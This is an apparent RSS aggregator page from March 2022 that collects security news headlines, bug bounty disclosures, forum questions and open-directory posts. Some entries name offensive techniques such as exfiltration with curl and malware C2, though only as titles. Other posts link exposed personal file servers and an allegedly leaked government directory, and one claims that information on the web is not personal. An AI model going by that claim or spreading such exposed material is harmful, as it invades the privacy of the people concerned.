    Seems like my post has been deleted again... Why not just take out the links that offend... Personal info is not personal if it is on the web... So Here is some funny... http://www.p14nd4.com/ars/ Starts here... http://www.thedevilsdue.us http://www.thedevilsdue.us/!.Music/AllMusic/!.DW.80GB/My%20Music/ music http://alliza.iptime.org/mobile/%c8%a8%c6%fa%b4%f5/%c1%c1%c0%ba%c0%da%b7%e1%bd%c7/%c0%bd%be%c7%c0%da%b7%e1%bd%c7/ http://iama.stupid.cow.org/Audio/ https://video.donaldandcheryl.net/Funny/ ​ https://simpsons.porn/assets/images/ ​ http://edmazur.com/images/funny/ ​ http://fricking.ninja/Media/photo_comments/mp4/ ​ http://www.kyudan.com/funny/Corel%20Auto-Preserve/ http://www.kyudan.com/funny/img/ ​ images... https://alt-tab.org/data/images/ submitted by /u/xanderTgreat [link] [comments]
    Printable Origami Paper Directory
    https://www.origamiway.com/printable-origami-paper/ submitted by /u/shaburushaburu [link] [comments]
  • Open

    Chrome 100 Beta: Reduced User-Agent Strings, Multi-Screen Window Placement, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 100 is beta as of March 3. 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Last Version for Unreduced User-Agent String Chromium 100 will be the last version to support an unreduced User-Agent string by default (as well as the related navigator.userAgent, navigator.appVersion, and navigator.platform DOM APIs). The origin trial that allowed sites to test the fully reduced User-Agent will end on April 19, 2022. After that date, the User-Agent String will be gradually reduced. To review …
  • Open

    【安全通报】Spring Cloud Gateway 远程代码执行漏洞风险通...
    近日,Spring官方发布了关于Spring Cloud Gateway的CVE报告,其中包含Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)。攻击者可通过该漏洞恶意创建允...
  • Open

    【安全通报】Spring Cloud Gateway 远程代码执行漏洞风险通...
    近日,Spring官方发布了关于Spring Cloud Gateway的CVE报告,其中包含Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)。攻击者可通过该漏洞恶意创建允...
  • Open

    A Case Study: Defending against ransomware with Microsoft Defender for Endpoint and Intel TDT
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape?
    CVE-2022-0492 is the third recent kernel vulnerability that allows malicious containers to escape. We offer root cause analysis and mitigations. The post New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape? appeared first on Unit42.
  • Open

    My computer keeps saying "network certificate not valid" or something like that, whenever I go to reddit, download libraries with gradle, basically anything at all. Am I under attack?
    SWE but no idea why I keep getting a red message in chrome when i try to go to websites i normally go to submitted by /u/oaxac9 [link] [comments]
    How can one protect oneself in case some devices of one's family get infected?
    One of my family has been complaining about her phone being always laggy. Which shouldn't happen because she uses a relatively new device? Well, there is also a possibility that she doesn't kill background possesses. But lately, I have been noticing the network becomes really laggy (supposedly it's not because of Ukraine?), and sometimes it just completely shut down/disconnects. Since we share the same wifi, are there any things I can do? Something to suggest to her, or for me to avoid getting infected, just in case. Thank you in advance! edit: I'm not sure if I should also include this but. I have a windows tablet and a Linux desktop that connects to the router through ethernet all the time. To be honest, I am not even sure if it can effect me in anyway, since I'm not educated at all in cybersecurity. Hopefully I'm just paranoid? Just to be sure haha, sorry for random posting. submitted by /u/manho1e [link] [comments]
    Where can I check if a website downloaded a force file?
    I mean if the websited forced a download of a file, sorry, no force thing. I noticed today that my hosts file was modified and was 127.0.0.1 suspiciousaddress. I checked the address on web scanners and said clean but that it had an ascii file, small, 170 characters, maybe a script? I by mistake put the address on google and the browser tried to open it, I closed it and my internet crashed as soon as I did that so now I'm worried. I also tried to enter using the ip and not the dns and got a message but didnt wrote it down. I'd like to check if the website is downloading something on my pc, some script etc, or what else can I do? ​ Thanks in advance. submitted by /u/HeroOfTheNorthF [link] [comments]
    Malware implication if I run VM via gnome boxes?
    I would like to check if malware could affect my main system (Silverblue), if I run windows or other linux distro via gnome boxes - could malware get into main os? If it could get affected, then would having amnesic help? I was reading how in some cases paging/ram could get copied into hard disk. So not sure. submitted by /u/AtomicFurion [link] [comments]
    What's your favourite Sandbox ?
    Hi guys, I'm going to build a simple home lab on a budget . Need recommendations regarding easy to deploy sandbox. What's your favorite sandbox and why? submitted by /u/breadcrumb2000 [link] [comments]
  • Open

    SecWiki News 2022-03-03 Review
    从网络空间认知战到对俄大规模网络致瘫攻击 by ourren 移动GS3101光猫分析 —— 狸猫换太子 by ourren 跟着三梦学Java安全:半自动挖洞 by ourren TA402 针对中东目标持续发起攻击 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-03 Review
    从网络空间认知战到对俄大规模网络致瘫攻击 by ourren 移动GS3101光猫分析 —— 狸猫换太子 by ourren 跟着三梦学Java安全:半自动挖洞 by ourren TA402 针对中东目标持续发起攻击 by Avenger 更多最新文章,请访问SecWiki
  • Open

    Manipulating User Passwords Without Mimikatz
    There are two common reasons you may want to change a user’s password during a penetration test: You have their NT hash but not their plaintext password. Changing their password to a known plaintext value can allow you to access services in which Pass-the-Hash is not an option. You don’t have their NT hash or... The post Manipulating User Passwords Without Mimikatz appeared first on TrustedSec.
  • Open

    FreeBuf早报 | 开源 PJSIP 库受到关键漏洞影响 ;工信部公布规定限制 APP 下载行为
    在俄乌冲突升级背景下,美国参议院选择一致通过《加强美国网络安全法》。
    如何预防钓鱼邮件?SMIME邮件安全证书来支招!
    网络钓鱼(Phishing,与钓鱼的英语fishing发音相近,又名钓鱼式攻击),通过冒充银行或其他知名机构向受害者发送欺骗性邮件,引诱收信人提供自己的敏感信息(如用户名、口令、ATM交易密码或
    风险上升!数据泄露和影子资产致企业网络攻击面扩大
    数据泄漏和影子资产是全球大型组织面临网络攻击的最大来源。
    游戏玩家注意了!黑客正传播可劫持社交媒体账户的恶意软件
    它主要通过微软的应用商店以计算机木马游戏应用程序的形式入侵。
    俄罗斯认为对其卫星发动网络攻击是战争行为,但入侵乌克兰不算
    隶属于匿名者的黑客组织宣布关闭俄罗斯航天局的控制中心。
    网络战发展成“第五战场”,这些数据告诉你乌克兰的网络现状
    俄罗斯总统普京宣布在乌克兰东部的顿巴斯地区进行特别军事行动。除了现实热战争以外,俄罗斯-乌克兰之间的“网络战”其实早已拉开序幕。
    MITRE对手交战框架V1及一系列落地指导文件发布
    给积极防御人员的对手交战指导建议
    CIS 2021大会·春日版启动线下录制,阳春相聚话安全
    3月2日上午,为期两天的「CIS 2021网络安全创新大会Spring·春日版」在上海宝华万豪酒店开启线下录制。
    新招数!BO彩平台支付通道新趋势,虚拟货币成“新宠”
    虚拟货币已成为BO彩平台充值、提现通道的“宠儿”,原先占主要地位的微信、支付宝等第三方充值方式,在某些BO彩平台逐渐销声匿迹。
    HTTP和HTTPS,六大常见问题
    有人对于HTTP和HTTPS,发出了疑问,小编收集了几个常见的问题,为您解答,希望在最大程度上帮助到您,让您更深层次了解HTTP与HTTPS。
    APT29 以疫情为话题攻击大使馆相关人员
    最近,APT29 又转换了攻击目标,将视线从SloarWinds转移到了大使馆。
    模块化银行木马IcedID 新变种浮出水面
    IcedID 是最早在 2017 年被披露的模块化银行木马,也是近年来最流行的恶意软件家族之一。
    干货 | 金融行业共享数据错综复杂,如何强化数据安全根基?
    数据分类分级能够有效促进金融数据在机构间、行业内的安全共享,有利于金融行业数据价值的挖掘与实现。

  • Open

    IDOR delete any Tickets on ads.tiktok.com
    TikTok disclosed a bug submitted by datph4m: https://hackerone.com/reports/1475520 - Bounty: $5000
    Open Redirect TO Stealing aadvid
    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1378533 - Bounty: $500
    Reflected XSS on www.pornhub.com and www.pornhubpremium.com
    Pornhub disclosed a bug submitted by wh0ru: https://hackerone.com/reports/1354161 - Bounty: $750
  • Open

    4300$ Instagram IDOR Bug (2022)
    Hello everyone! Today im going to explain how i found a 4300$ IDOR Bug on Instagram. Continue reading on Medium »
    My personal favourite top 20 hacking tools.
    1. Nmap (Network Mapper) Continue reading on Medium »
    What is the John The Riper(JTR)? How to use JTR?
    What is the John The Riper? Continue reading on Medium »
    How did I find Directory Traversal attack using GitHub
    Hello, Continue reading on Medium »
    Bug Bounty — How to approach Vulnerabilities ( PART 1 )
    Hello people, it’s me again. In most cases, with automated tools, you can possibly find low level security bugs i.e most likely Blind XSS… Continue reading on Medium »
    IDOR in support.mozilla.org through Code Review
    I was trying to improve my static analysis code, specifically django apps, so i decided to hack a random project in github. And i found… Continue reading on Medium »
    Community Newsletter — March 2022
    As the Pandora community continues to grow stronger with each passing day, we would like to take this opportunity to thank everyone for… Continue reading on Pandora Protocol »
    Do data practitioners are the new (security) weakest link?
    Secrets in code Continue reading on CodeX »
    Business Logic Bug| Email Existing Bypass | Running 2 accounts with a single email
    Vulnerability Category: Business Logic Error Continue reading on Medium »
    Find bugs by Google dork method
    Cre : https://medium.com/@fcwdbrqmr/400-bounty-again-using-google-dorks-6dc8e438f017 Continue reading on Medium »
  • Open

    Could artifacts be missing from Magnet Axiom?
    Hi there, hoping some of you are Magnet Axiom users and may be able to help me with this conundrum I have *some nonessential information has been altered for protection*: I have received a Portable Case from someone who has full license to the platform. I understand how the Portable Case is created (via watching the Magnet tutorial videos). The Portable Case is supposed to contain the contents of John Doe's cell phone. Separately, I have Snapchat Returns for John Doe's Snapchat account, and as far as is known John Doe only owned the one aforementioned cell phone. In looking at the Artifacts in the Portable Case, there seem to be things missing. For example: The Portable Case is supposed to cover a time period of 01/01/2XXX through 05/15/2XXX. When comparing the Snapchat Returns > Snapchat Memories I am able to see a specific video file - I'll call it "Selfie A" - from 02/03/2XXX 08-48-56 UTC. But when looking at the Portable Case > CHAT > Snapchat Memories artifacts there is no corresponding artifact. There are other video artifacts from that same date and around that time, but not "Selfie A." There are many files I have identified with this same issue. So now the question: I will admit I have not had formal training on Axiom (nor am I a digital forensics professional by trade) so I am willing to withhold suspicion for now, but, is it possible that artifacts could appear from Snapchat Returns that were missed in Axiom? Maybe "Selfie A" was deleted from the phone so it doesn't appear in Axiom but it does appear in the Returns data from Snapchat? (I hate even typing that question because I know even "deleted" things can be forensically recovered but go with me here). Or, is it more likely that the "Selfie A" artifact is visible in the Snapchat Returns but not in the Portable Case because the creator of said Portable Case chose not to include the artifact? submitted by /u/mclaughlinkessell [link] [comments]
    Tips on the GDAT certification (SEC599)
    Hi all, I have just enrolled for the SEC599 (OnDemand) and will be going through the GDAT exam as well. Are there any tips which could help me prepare better and pass the exam? My intro - Have been into SOC and IR for 5+ years now, and this is going to be my first certification submitted by /u/Suchi-Bee [link] [comments]
    Pagefile/ Cache question
    Hey Guys I work in law and as you probably have experienced we are stunningly ignorant on computer forensics. When I have a bit of time I like to research various computer forensic things and evidence from browsers are quite fascinating to me. I have two questions that I'd love help answering. 1) I'm assuming that this is a stupid/ basic question but I read that pictures in the cache are copies of the original essentially and as such they would contain meta data like locations and so on, is that also correct for stuff in the pagefile? 2) I've messed around with the belkasoft software trail run to view the pagefile on my PC, the categories that the data is broken up into is fairly understandable browsers, instant messengers. And they contain images and urls. However there is a category called other files and I'm not sure what is contained in them? submitted by /u/curiousstudent99l [link] [comments]
  • Open

    Thought this might be of interest
    ​ ​ https://46.mangovideo.pw/contents/videos/ http://server217.mangovideo.pw/contents/videos/ https://177.mangovideo.pw/contents/videos/ https://68.mangovideo.pw/contents/videos/ https://server9.mangovideo.pw/contents/videos/ https://45.mangovideo.pw/contents/videos/ https://new.mangovideo.pw/contents/videos/ https://5.mangovideo.pw/contents/videos/ https://234.mangovideo.pw/contents/videos/ https://183.mangovideo.pw/contents/videos/ https://31.mangovideo.pw/contents/videos/ https://60.mangovideo.pw/contents/videos/ https://s10.mangovideo.pw/contents/videos/ https://183.mangovideo.pw/contents/videos/ submitted by /u/TiThelis [link] [comments]
    CALISHOT 2022-03: Find ebooks amongst 395 Calibre sites this month.
    submitted by /u/throwaway176535 [link] [comments]
  • Open

    If you change the SIM card, google will automatically add that number to your google account.
    A tech at Verizon put his personal SIM in my phone to see if it could support the network. I'm attempting to change from ATT to Verizon on my unlocked android phone. A little while later, a notification from google that his personal phone number has been added to my Google account(s), alongside my own phone #. Does this mean that you can access someone's Google account(s) by surreptitiously inserting a SIM into their phone, even if you don't have their pin# or severed finger? submitted by /u/Dougolicious [link] [comments]
    Ghosted after vulnerability disclosure
    I recently disclosed a unauthenticated RCE to a company that provides virtual network appliances, the process was going good and they patched the vulnerability, but upon my request for patch release/notes they ghosted me. I already have CVE numbers assigned but would like to have mitre publish them but don't know what to do if the company is not being cooperative, anyone have any suggestions? submitted by /u/BasedThug [link] [comments]
    Should I pursue the OSCP certification?
    I have 6 years of experience as a software engineer, and recently started working as an Application Security Engineer doing mostly static and dynamic analysis of our apps. I have plenty of books and online courses to work through, and recently started tinkering with HackTheBox. I thought about pursuing the OSCP cert. Realistically with a full-time security job and other obligations I probably won't be able to commit all my spare time to this, so the 30/60/90 day lab access periods probably won't be enough time to finish the course. The 1 year long lab access is $2500, which is quite a steep price. I'm curious to know if the OSCP training will benefit me in a way that my job and HackTheBox won't. submitted by /u/cppnewb [link] [comments]
    ISO 27001:2021 GAP analysis
    Hi , I'm working for a company which is ISO 27001:2013 certified and i was asked to do a GAP analysis on ISO 27001:2021 stranded. So If there are any useful article or any references , please share it. TIA submitted by /u/darkwolf-95 [link] [comments]
    Thoughts on Kaspersky AV/Anti-malware after recent events?
    Hey all, Wondering what your thoughts are on kaspersky as an AV tool, and as a company given recent events. Do you think with all the independent reviewers that they could still be compromised by say KGB/Russian government? Sorry, not trying to be political, but the recent events can be directly tied to multiple netsec topics. submitted by /u/Fizgriz [link] [comments]
  • Open

    moodle 2nd order sqli 0-day
    submitted by /u/mufinnnnnnn [link] [comments]
    How to analyze malicious documents – Case study of an attack targeting Ukrainian Organizations
    submitted by /u/CyberMasterV [link] [comments]
    Guardio security team discovered an active network of sophisticated crypto attacks targeting the MetaMask wallet
    submitted by /u/oldrobgin [link] [comments]
  • Open

    Bash Tricks for File Exfiltration over HTTP/S using Flask
    submitted by /u/cyberbutler [link] [comments]
  • Open

    SecWiki News 2022-03-02 Review
    合作方数据安全闭环管理实践 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-02 Review
    合作方数据安全闭环管理实践 by ourren 更多最新文章,请访问SecWiki
  • Open

    Bash Tricks for File Exfiltration over HTTP/S using Flask
    This post outlines techniques to exfiltrate files using curl and encode, encrypt, and save captured files using a custom Flask Web Server Continue reading on Maveris Labs »
  • Open

    Driver from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    Driver from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    Driver from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    My First Osint Challenge
    One fine day I was Scrolling through tweets and my eyes got a tweet that Dan Conn tweeted a osint challenge on Oct 5, 2021 mentioning his… Continue reading on Medium »
    Maltego OSINT Tool Intro
    Maltego is a tool for OSINT and visual link analysis. It can pull data from multiple sources to explore the properties of entities and the… Continue reading on Medium »
    Working with your own data: tips and tricks to kickstart your analytical task
    Our recent articles mostly tell about Lampyre’s OSINT capabilities. This one will be different as it describes the data analysis side of… Continue reading on Medium »
  • Open

    Know Your Infusion Pump Vulnerabilities and Secure Your Healthcare Organization
    Scans of more than 200,000 infusion pumps on the networks of hospitals and other healthcare organizations found 75% had known security gaps. The post Know Your Infusion Pump Vulnerabilities and Secure Your Healthcare Organization appeared first on Unit42.
  • Open

    FreeBuf早报 | 乌研究员泄露 Conti 勒索软件源代码;苹果禁用俄 iPhone 核心功能
    苹果表示,在俄罗斯对乌克兰发动攻击后,它已经停止在俄罗斯销售其产品并限制苹果支付功能。
    快速定位挖矿木马!
    挖矿木马最大的一个特征就是cpu资源占用非常高,top命令查看cpu情况,可以看出xmr这个进程占用cpu资源很高。
    什么是SDK,它是怎样威胁我们的隐私?
    截至目前,尚有107款APP未完成整改,洋码头、中公教育等APP在列。
  • Open

    Exposing the Conti Ransomware Gang - An OSINT Analysis
    UPDATE:The following set of graphics aims to visualize the recently leaked Conti ransomware gang members conversations.UPDATE:The following is a complete list of all the Bitcoin addresses used by the Conti ransomware gang members obtained using public

  • Open

    4 Weeks to prep for GCFA
    Is this even possible? I was given the material yesterday. I have some training under my belt, but overall still a noob when it comes to DFIR. Currently sitting through a 6 day course with a SANS instructor, but I feel like I am getting the exact same information from just reading the books. My experience in IT is less than 2 years and all training. Sec+ being my only previous cert. submitted by /u/SnooDogs3246 [link] [comments]
    ASK ALL NON-FORENSIC DATA RECOVERY QUESTIONS HERE
    This is where all non-forensic data recovery questions should be asked. Please see below for examples of non-forensic data recovery questions that are welcome as comments within this post but are NOT welcome as posts in our subreddit: My phone broke. Can you help me recover/backup my contacts and text messages? I accidently wiped my hard drive. Can you help me recover my files? I lost messages on Instagram, SnapChat, Facebook, ect. Can you help me recover them? Please note that your question is far more likely to be answered if you describe the whole context of the situation and include as many technical details as possible. One or two sentence questions (such as the ones above) are permissible but are likely to be ignored by our community members as they do not contain the information needed to answer your question. A good example of a non-forensic data recovery question that is detailed enough to be answered is listed below: "Hello. My kid was playing around on my laptop and deleted a very important Microsoft Word document that I had saved on my desktop. I checked the recycle bin and its not there. My laptop is a Dell Inspiron 15 3000 with a 256gb SSD as the main drive and has Windows 10 installed on it. Is there any advice you can give that will help me recover it?" After replying to this post with a non-forensic data recovery question, you might also want to check out r/datarecovery since that subreddit is devoted specifically to answering questions such as the ones asked in this post. submitted by /u/AutoModerator [link] [comments]
    Answering general digital investigation questions
    Last week we ran a stream about forensic hardware and got A LOT of general digital forensic questions. It might be interesting to anyone new to computer forensics. Use the chapter times in the video description to jump around. We also talk about hardware write blockers and forensic imagers. https://youtu.be/O1bZvGqmP1Y submitted by /u/DFIRScience [link] [comments]
    Incident Responder looking to transition into a digital forensics role
    Hello everyone! I have worked in infosec and IT for 6 years in incident response roles for companies ranging from startups to fortune 50. I currently work at a startup local cybersecurity firm where I am an incident response engineer and consultant. I handle everything on the IR side including ransomware cases, business email compromise, data theft, threat hunting, and compromise assessments. I also have my GSEC, GCIH, GCFE, and GCFA certifications. I love what I do, but I am burnt out. I’m tired of being on call 24/7/365, never being able to bring any of the criminals I work against to justice, and much more. My family and I are settling down, and I am interested in transitioning to a more traditional digital forensics role working on criminal cases. I want to have a more steady, stable case load, and actually see the results of my work helping bring people to justice. I was wondering if any of you have made a similar transition, and if there are any recommendations or insights that could help me make this switch. I have read the FAQ here and am looking for new jobs in this space, but would love to get some input from this community. Any thoughts? submitted by /u/horizon44 [link] [comments]
    What are some good triage tools for live MacOS and Linux systems?
    A customizable hash list is a must! Thanks submitted by /u/DHZX [link] [comments]
    Homework Help in HxD
    submitted by /u/Flaky_Tonight3305 [link] [comments]
  • Open

    Open Directories Kodi addon for version 19 Matrix?
    Anybody know where there is an updated version of the open directories addon for Kodi? We had an addon for Kodi version 18 Leia, but since that version relied on python 2, we now need an updated version for python 3. Or something similar. submitted by /u/studio222 [link] [comments]
    Collection of vintage video game and pc commercials
    http://ftp.kameli.net/pub/pkpvideos/ submitted by /u/inoculatemedia [link] [comments]
    Ministry of Economic Development of Russia Leaked by anonymous
    The sites seem to be down but I will provide the links in case they are back on. https://old.economy.gov.ru/minec/resources/ https://old.economy.gov.ru/wps/wcm/connect/economylib4/designElements/resources/ These are the tweets that link me there: https://twitter.com/youranonone/status/1498685800241934342?s=21 https://twitter.com/anonymous_link/status/1498607316836536320?s=21 submitted by /u/__babygiraffe__ [link] [comments]
  • Open

    Which is the efficient way to practice web application security?
    I read two books about web application security. Web Application Security: Exploitation and Countermeasures for Modern Web Applications Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities But I didn't practice enough. I have multiple options to practice it Port Swigger Web Security Academy bWAPP Vulnerability Disclosure Programs on HackerOne As I said I already read books about this topic, maybe I don't need to read PortSwigger Academy Articles. bWAPP is good but it consists lots of vulnerabilities and I can't figure out how to prepare a work plan for that (Because of vulnerability count and expertise levels). VDPs on HackerOne are good because they are real-life challenges but I don't even know I am ready or not for testing real applications. I am open to any advice. submitted by /u/pacman0026 [link] [comments]
    Options for a malware sandbox with Internet access
    I am looking for a solution to work with and detonate potentially malicious files & malware. A isolated (from rest of LAN) malware sandbox .. with Internet access. I have been considering a Type 2 hypervisor such as VirtualBox running Windows 10 Pro. it seems if I go with this solution I may need a 2nd VM running a Firewall to ensure the Win10VM cannot spread malware to other devices on the LAN. Seeking input on other methods or options to build such a environment. submitted by /u/q_logsource [link] [comments]
    Help to improve AKS Pod's security
    Hello. I want to use Azure Kubernetes environment for running Azure DevOps build agents. Besides, tried to make the environment secure, by following the principle of least privilege. As a result - Dockerfile and Pod's definition which runs container as an unprivileged user (nobody) on a read only filesystem (except /tmp and /azp paths). What else could be done to improve environment's security? submitted by /u/groovy-sky [link] [comments]
    How do you organize your study?
    Currently I work as SOC analyst, I do like studying and coding, so after work I usually study some stuff related to security, but from time to time I find myself starting new courses without finishing anything, and read about different topics, but can't focus, which waste much time and effort. I'm not sure if anyone else faces the same issue and how can I focus more? submitted by /u/xoutisx [link] [comments]
    What are the biggest barriers stopping NetSec from going into Virtual Reality?
    Specifically, imagine a Virtual Reality tool that would allow you to navigate your entire network in a three dimensional space, to detect vulnerabilities and such. The first barrier that comes to mind would be cost of equipment, especially if organizations need to buy multiple headsets for their employees. But what other barriers do you forsee? VR is already pretty popular, so I'm surprised its not already more adopted in this space. Disclaimer: I work for a VR startup in the NetSec space and we are trying to gather feedback from NetSec professionals. You can visit our website if you want to learn more, we are offering headsets in exchange for good user feedback. There's a survey link on our contact us page: https://valkure.com TIA submitted by /u/loshofficial [link] [comments]
    Entire infosec team replaced by... IT team?
    Anyone ever experience this? I'm the last technical infosec person left on a former team of ~14 people. Now we have replaced the entire infosec team with IT/non-infosec people, who are all basically entry-level in infosec, although they may have skills in other areas such as IT/cloud. I feel genuinely concerned because it's clear none of them have the skills, knowledge or experience to do anything in these job functions security wise. They are just having tons of random meetings to try and figure out what to do next, and not actually getting anything done. They've been "talking" about what to do for 9 months. It's starting to feel like a scam, and I'm having to hold people's hands with extremely basic scripting and technical tasks. At first it was cool, because I had the opportunity to mentor them, but NOTHING is getting done. What the hell is going on? submitted by /u/netipotty [link] [comments]
    Is whitelisting DNS zones to prevent DNS tunneling viable? Why is it not more common?
    I'm concerned about malware which uses DNS channels to communicate home. I'm thinking about ways to mitigate this threat for my servers, and the most obvious measure that comes to mind, is to have my DNS resolver block recursive lookups to zones which are not whitelisted. So, the plan is to (1) make my firewall block all DNS traffic from my server except to my own resolver, and (2) have my own resolver block all lookups to non-whitelisted zones. So e.g., a lookup to *.microsoft.com would be recursively resolved, but not a lookup to *.evildomain.com. When Google searching for ways to mitigate DNS tunneling, this is not a commonly suggested countermeasure. Most blogs and articles answer this question by referring to some expensive, "smart", enterprisey DNS filter. Is my countermeasure less easy than it sounds? If not, why is this countermeasure not more common? submitted by /u/engineerL [link] [comments]
    What is the most difficult part of being a SOC Analyst?
    Every job has pros and cons. What do you think about being a SOC analyst? A lot of people are saying about stress and over working. Maybe it's not worth being a SOC analyst? What do you guys think? submitted by /u/umuttosun [link] [comments]
    How to test our AV/EDR
    So if I remember well, a few years ago there were dedicated scripts and binaries to test if your AV/EDR works well, but I can’t find that anywhere. Do you have recommendations for that? What I’d like is to go a bit further than just compiling and running netcat/mimikatz… which would not involve running MSF modules at all. submitted by /u/EsreverEngineering [link] [comments]
    Not getting methodological approach to information audit. What are they trying to say?
    https://www.reddit.com/r/audit/comments/t47la5/not_getting_methodological_approach_to/ submitted by /u/whatusernameiscool [link] [comments]
    How do cybercriminals/"hackers" defend themselves?
    I've always been puzzled by the idea that hackers are vulnerable themselves? Like how can one say they are 100% defended from counter-attack? In any reading/research on cyber-defence I've ever done, the idea is you can never be 100% secure. Is it like an arms race of being "cleverer" than whoever might be on the counter-attack? Not sure if anyone can shed insight on this - thanks \editing post to say you can never be 100% secure, previously I had 10%) submitted by /u/mdgsec [link] [comments]
    Getting Started on Pentesting an IOT Device
    I'm relatively inexperienced at security and am trying to improve my skills. I have a custom made IOT device at home which I am trying to find vulnerabilities in and am looking for suggestions of what to investigate. I scanned with nmap using script=vulners. Only port 22 is open and there are a few vulnerabilities (OpenSSH 7.9p1) but nothing very promising as far as I can tell. Brute-forcing the SSH password using Hydra is also not very promising as it is fairly slow and I know the device has a reasonably complex password which is not in common password lists like rockyou. Any suggestions on other approaches to find vulnerabilities in the device? submitted by /u/MrKhutz [link] [comments]
    What is vulnerability sweeping?
    I was asked the question what vulnerability sweeping, but I can't seem to find a definitive answer for it, only definitions for vulnerability scanning. submitted by /u/pleaseweallneedhelp [link] [comments]
  • Open

    Protests against Russia’s attack on Ukraine + more
    the discursus Protest Analytics newsletter, March 1st, 2022 edition. Continue reading on discursus.io »
    The Ides of March: Fall of the Russian Bear?
    A critical update has come across my feed. The New York Times lost the lede in a story today. Continue reading on Medium »
    Verify Viral Photos with Reverse Search
    How to use Google Reverse Image Search to verify the source of photos from Ukraine Russian conflict. Continue reading on Medium »
  • Open

    5 New Vulnerabilities in PJSIP Multimedia Library, including RCE
    submitted by /u/SRMish3 [link] [comments]
    Triaging A Malicious Docker Container
    submitted by /u/MiguelHzBz [link] [comments]
    Multiple vulnerabilities found in voip monitor by an Ethiopian Security firm
    submitted by /u/nathanAbejeM [link] [comments]
    TeaBot is now spreading across the globe | Cleafy Labs
    submitted by /u/f3d_0x0 [link] [comments]
    Exploiting CVE-2021-26708 (Linux kernel) with sshd
    submitted by /u/hardenedvault [link] [comments]
  • Open

    MySQL DUMPFILE
    Este artigo tem como objetivo reforçar a importância da realização do hardening e/ou revisão de segurança antes de colocar um servidor de… Continue reading on 100security »
    Analysis of a trojanized anydesk
    This blog provides a detailed analysis of anydesk application that has been trojanized and distributed from a ranked unofficial website… Continue reading on Medium »
  • Open

    Password Reset to Admin Access
    While testing a web application that used a web GUI over the top of an API, I noted the calls to the API where authorized with a JWT token… Continue reading on Techiepedia »
    What After 12th? as an Ethical Hacker.
    This is not an accurate path for an ethical hacker. Continue reading on Medium »
    No Rate Limiting on Forget Password Page (Email Triggering)
    Vulnerability Category: A6- Security Misconfiguration Continue reading on Medium »
    Facing Issues with Nuclei upgrade??
    Few weeks back, I too faced the same situation. Tried multiple ways to upgrade my Nuclei version but it just got stuck at version 2.2.0… Continue reading on Medium »
    On the way to 2nd Bounty XSS and Apache server .
    Hello readers, in this post, we’ll look at XSS and Apache Server furthere on apache server I will post another article. Continue reading on Medium »
  • Open

    SecWiki News 2022-03-01 Review
    聊一聊《Bvp47 美国NSA方程式的顶级后门》中的BPF隐藏信道 by ourren DICOS:在Stack Overflow社区不安全代码发现方法 by ourren 2022年最热安全技术"BAS"详解 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-01 Review
    聊一聊《Bvp47 美国NSA方程式的顶级后门》中的BPF隐藏信道 by ourren DICOS:在Stack Overflow社区不安全代码发现方法 by ourren 2022年最热安全技术"BAS"详解 by ourren 更多最新文章,请访问SecWiki
  • Open

    在线社交网络中识别虚假个人资料的动态CNN模型
    在线社交网络 (OSN) 是用于共享各种数据(包括文本、照片和视频)的流行应用程序。 然而,假账户问题是当前 OSN 系统的障碍之一。 攻击者利用虚假帐户分发误导性信息,例如恶意软件、病毒或恶意 UR
    算法推荐管理规定3月1日施行,算法备案系统正式上线
    《规定》明确,应用算法推荐技术,是指利用生成合成类、个性化推送类、排序精选类、检索过滤类、调度决策类等算法技术向用户提供信息。
    Conti支持俄罗斯,乌克兰成员公布了其内部聊天记录
    就在Conti 勒索组织选择支持俄罗斯之后,一名乌克兰籍的成员泄露了6万多条Conti 勒索组织内部聊天的消息。
    FreeBuf早报 | 保险业巨头 AON 周末遭遇网络攻击;莫斯科交易所被网络攻击击落
    微软透露,在入侵前几个小时,乌克兰实体成为了先前未被发现的恶意软件 FoxBlade 的攻击目标。Microsoft 威胁情报中心 (MSTIC) 继续调查针对...的攻击。
    保险业巨头 AON 遭网络攻击
    AON披露他们在2022年2月25日遭受了网络攻击,在报告中,除了发生攻击并影响了有限数量的系统外,AON 没有提供额外的消息。
    丰田日本工厂因供应商遭受网络攻击而停止生产
    因为丰田汽车提供内外饰塑料部件的供应商小岛工业因遭网络攻击,丰田在日工厂从3月1日起暂停生产。
    网络战发展成“第五战场”,这些数据告诉你乌克兰的网络现状
    网络战已经发展成与海、陆、空、天等领域具有相同的领域地位,也被列为“第五战场”。
  • Open

    Demonstration of how use Counter-Strike 1.6 as Malware C2
    If you're a malware operator who likes to Rush B and want to manage your victims while playing games, this is for you. https://www.youtube.com/watch?v=b2L1lWtwBiI&t=1s https://twitter.com/kaganisildak/status/1498585440680656896 submitted by /u/kaganisildak [link] [comments]
  • Open

    Session Fixation on Acronis
    Acronis disclosed a bug submitted by hatnare: https://hackerone.com/reports/1486341
  • Open

    Exploiting CVE-2021-26708 (Linux kernel) with sshd
    Article URL: https://hardenedvault.net/2022/03/01/poc-cve-2021-26708.html Comments URL: https://news.ycombinator.com/item?id=30511060 Points: 2 # Comments: 0
  • Open

    Windows Exploitation Research
    Hi, I am starting windows security research to understand how windows internals works and how one can exploit it. If anyone interested he/she can DM me submitted by /u/i_whiteheart [link] [comments]
  • Open

    Samsung Encryption Vulnerability [pdf]
    Article URL: https://eprint.iacr.org/2022/208.pdf Comments URL: https://news.ycombinator.com/item?id=30510543 Points: 1 # Comments: 0

  • Open

    Essential Skills to be a SOC Analyst
